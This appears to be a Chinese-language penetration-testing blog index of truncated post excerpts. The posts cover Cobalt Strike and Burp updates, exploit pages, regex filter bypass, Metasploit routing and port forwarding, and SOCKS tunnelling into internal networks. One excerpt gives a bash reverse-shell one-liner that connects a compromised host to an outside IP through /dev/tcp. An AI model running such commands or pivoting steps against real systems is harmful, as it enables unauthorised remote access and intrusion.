Run

Cobalt Strike 4.3更新日志12345678910111213141516171819202122232425-------------+添加了对dns-beacon Malleable C2组的支持。 添加了DNS主机指示器的选项： 信标，get_A，get_AAAA，get_T ...

前言 制作简单exp的学习记录 一、简单的HTML编写注入EXP12345678910111213<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>简单的HTML EXP编 ...

前言 正则绕过知识总结 一、换行符绕过12345678910111213<?phpinclude("flag.php");highlight_file(__FILE__);$c = $_GET['c'];if (preg_match(' ...

bash反弹：首先公网主机监听指定端口，然后肉鸡执行bash命令向公网指定端口发送连接请求 12345公网主机： nc -lvvp 9090肉鸡执行： bash -c 'exec bash -i &>/dev/tcp/47.99.163.64&#x ...

前言 metasploit 通过增加路由来扫描对应端口 路由方式进内网首先提权到了system权限 1、看有几个网段 1run get_local_subnets 2、增加一个网段的路由 1234run autoroute -s 192.168.0.0/24/&#x ...

前言 kali中的proxychains和earthworm配合的socks5隧道技术 首先明确一点，拿到了对方的机子，但是对方是内网机子，我们无法连接对方的3389端口，得将对方内网带入我们的kali攻击机中，使我们可以直接访问对方内网ip，下面开始实施 首先利用ew将我们公网上的一个端口转 ...

前言 metasploit 端口转发使用 portfwd模块 端口映射和端口转发，使用公网的是msf 本机是172.31.239.104，想要访问的是被攻陷192.168.0.115网中的一个ip段网站192.168.0.100 利用portfwd模块来将192.168.0.100:80端口 ...

BurpSuite2021.8更新日志BurpSuite2021.8发布于2021年8月5日. 此版本为 Burp 的 HTTP/2 支持提供了一系列强大的新增强功能。这使您能够识别和利用许多 HTTP/2专有漏洞,包括 James Kettle 在 Black Hat USA 2021 上提出的漏 ...

xray介绍xray 是一款功能强大的安全评估工具，由多名经验丰富的一线安全从业者呕心打造而成，主要特性有: 检测速度快。发包速度快; 漏洞检测算法高效。 支持范围广。大至 OWASP Top 10 通用漏洞检测，小至各种 CMS 框架 POC，均可以支持。 代码质量高。编写代码的人员素质高, 通 ...

前言 提权扫描工具使用 Windows-Exploit-Suggester Windows-Exploit-Suggester这个工具很强，但是依赖更新了，所以有几个坑，我记录一下 1、安装 1git clone https://github.com/AonCy ...